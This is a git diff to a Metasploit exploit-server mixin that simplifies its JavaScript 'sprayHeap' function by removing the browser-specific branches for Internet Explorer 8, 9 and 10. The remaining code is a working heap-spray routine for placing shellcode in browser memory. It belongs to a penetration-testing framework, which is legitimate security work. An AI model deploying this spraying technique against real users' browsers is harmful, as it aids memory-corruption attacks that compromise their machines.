diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index b69acde1f3..bd0e6f0942 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -799,8 +799,6 @@ protected # # The "sprayHeap" JavaScript function supports the following arguments: # shellcode => The shellcode to spray in JavaScript. - # browser => The type of browser to target for precise block size, such as: - # 'ie8', 'ie9', 'ie10', and 'generic'. # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 # heapBlockSize => Optional. Allocation size, default: 0x80000 @@ -822,7 +820,6 @@ protected function sprayHeap( oArg ) { shellcode = oArg.shellcode; - browser = oArg.browser; offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; maxAllocs = oArg.maxAllocs; @@ -832,7 +829,6 @@ protected if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (maxAllocs == undefined) { maxAllocs = 0x350; } - if (browser == undefined) { browser = 'generic'; } if (offset > 0x800) { throw "Bad alignment"; } @@ -855,31 +851,8 @@ protected for (var i = 0; i < maxAllocs; i++) { var obj = document.createElement("button"); - switch (browser) - { - case 'ie8': - obj.title = data.substring(0, (heapBlockSize-6)/2); - div_container.appendChild(obj); - break; - - case 'ie9': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'ie10': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'generic': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - default: - throw "Invalid argument"; - } + obj.title = data.substring(0, (heapBlockSize-2)/2); + div_container.appendChild(obj); } } |